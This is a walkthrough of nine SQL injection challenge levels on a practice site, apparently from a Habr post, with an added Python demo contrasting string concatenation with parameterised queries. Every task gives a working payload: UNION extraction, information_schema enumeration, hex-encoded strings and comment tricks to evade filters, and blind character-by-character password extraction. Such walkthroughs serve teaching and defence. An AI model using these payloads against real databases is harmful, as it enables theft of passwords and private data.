Task 1
Given: table users with fields id, login, pass.
Query: select * from users where id = '12 '
https://www.alexbers.com/sql/1.php?text=select+*+from+use+++ID%3D%2712%27
Task 2
Query: select * from users where id = 2 or login = '$text'
Table: users. Fields: id, login, pass. Requirement: "Hooray, I know the answer" (the password of the user with id = 9).
https://www.alexbers.com/sql/qnbutn2.php?text=-1' or id='9
The resulting query is:
select * from users where id = 2 or login = '-1' or id = '9'
That is, from the users table we select the rows where id=2, or login='-1', or id=9. The quote we supply on the left is closed by the quote that was already in the original query. Since a user with login -1 does not exist, that condition matches nothing, but id=9 exists. As a result, the output consists of two rows: the user with id=2 and the user with id=9.
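To show why the Task 2 query behaves this way, here is an added example (not from the original post and not the alexbers.com challenge code) that rebuilds the query over an in-memory SQLite table with constructed rows and contrasts string concatenation with a bound parameter. It assumes SQLite in place of MySQL and invented user rows.

```python
import sqlite3

# Constructed stand-in for the challenge's users table (id, login, pass); rows are invented.
ROWS = [(2, "alice", "pw-2"), (9, "bob", "pw-9"), (13, "carol", "pw-13")]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return db


def vulnerable_lookup(db, text):
    # The challenge's query shape: $text is spliced straight into the SQL string,
    # so a quote in the input ends the literal and the remainder is parsed as SQL.
    sql = f"select * from users where id = 2 or login = '{text}'"
    return sorted(row[0] for row in db.execute(sql).fetchall())


def safe_lookup(db, text):
    # Same query with $text bound as a parameter: the driver passes it as a value,
    # so it is only ever compared against login and is never parsed as SQL.
    sql = "select * from users where id = 2 or login = ?"
    return sorted(row[0] for row in db.execute(sql, (text,)).fetchall())


# The post's payload: closes the literal and appends "or id = '9"; the original
# query's own closing quote terminates the injected string.
PAYLOAD = "-1' or id = '9"

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", vulnerable_lookup(db, PAYLOAD))  # [2, 9]
    print("parameterised:", safe_lookup(db, PAYLOAD))      # [2]
```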
Task 3
Query: select * from users where id = 2 or login = '$text' limit 1
Table: users. Fields: id, login, pass. Requirement: "Hooray, I know the answer" (the password of the user with id = 13).
https://www.alexbers.com/sql/sdjjy3.php?text=-1' or id = 13 -- 123
The resulting query is:
select * from users where id = 2 or login = '-1' or id = 13 -- 123' limit 1
Everything after -- is a comment, so the original closing quote and the limit 1 no longer apply.
Task 4
Query: select * from users where id = 2 or login = '$text' limit 1
Tables: users, secret. The fields id, login, pass are in users; the secret table has 3 fields. Requirement: "Hooray, I know the answer" (the row of the secret table whose field ggg = abc).
Here the UNION operator is used. The task requires finding the row of the secret table with the field ggg=abc. The number of columns is the same in both tables, so the request will look like:
https://www.alexbers.com/sql/qjqhweh4.php?text=-1' union select * from secret where ggg='abc' -- 123
Task 5
Query: select * from users where id = 2 or login = '$text' limit 1
Tables: users, secret. The fields id, login, pass are in users; the secret table has 2 fields. Requirement: "Hooray, I know the answer" (the contents of the secret table).
As with the users table, we first extract the list of all columns of the secret table. This time the number of columns does not match, so union has to be used differently:
https://www.alexbers.com/sql/sdfkjsdk5.php?text=1' union select 1, concat_ws(0x3a, table_name, column_name), 3 from information_schema.columns where table_name='secret' -- 123
The second request then selects the two columns found from secret, padding the column count with a constant:
https://www.alexbers.com/sql/sdfkjsdk5.php?text=-1' union select 1, dfgdfgfdg, dfgfddfgdfdfdf from secret -- 123
Task 6
Query: select * from users where id = $text limit 1
Table: users. Fields: id, login, pass. Quotes are filtered, and only one row is output from the database. Requirement: "Hooray, I know the answer" (the password of the user with the nickname god).
The mysql_real_escape_string filter does not help when the value of the id variable is not placed in quotes. Even if quotes are filtered 50 times, we do not need them: for text fields you can use the CHAR() function or convert the string to hex.
https://www.alexbers.com/sql/skldj6.php?text=-1 union select id, login, pass from users where login = 0x676f64
(0x676f64 is the string god in hex.)
Task 7
Query: select * from users where id = $text limit 1
Table: users. Fields: id, login, pass. Now only the first row of the answer is always displayed (the rest are not). The characters ', ", +, =, comma, space and brackets are filtered. Requirement: "Hooray, I know the answer" (the password of the user whose nickname contains gentoo).
Spaces are replaced by the comments /**/ and /*!*/. Only one problem remains: the equal sign is filtered. It can be circumvented with the like operator. Comparing with a string would require quotes, so we encode it in hex. Also, we do not know the exact nickname we are looking for, so we use a mask search with the % sign in the login. The final attack vector will look like:
https://www.alexbers.com/sql/dsfhsdjkf7.php?text=-1/*!or/*!login*/like/**/0x2567656e746f6f25
(0x2567656e746f6f25 is the string %gentoo% in hex.)
Task 8
Query: select * from users where id = $text
Table: users. Fields: id, login, pass. Hint: no error messages will appear. Requirement: "Hooray, I know the answer" (the password of the user with the nickname fast).
To take a single character of the password we use the mid() function, and to convert it to its ASCII code the ascii() function. The attack vector then looks like this:
https://www.alexbers.com/sql/qqqwwweeerrr8.php?text=-1 or id <= (select ascii(mid(pass,1,1)) from users where login='fast')
Task 9
Query: select * from users where id = $text
Table: users. Fields: id, login, pass. Requirement: "Hooray, I know the answer" (the numerical sum of user logins with 20 <= id <= 30).
https://www.alexbers.com/sql/almost9.php?text=-1 or id <= cast((select sum(login) from users where id between 20 and 30) as signed INTEGER) / 10
https://www.alexbers.com/sql/almost9.php?text=-1 or id <= MOD(cast((select sum(login) from users where id between 20 and 30) as signed INTEGER), 10)
Source: https://habr.com/ru/post/253885/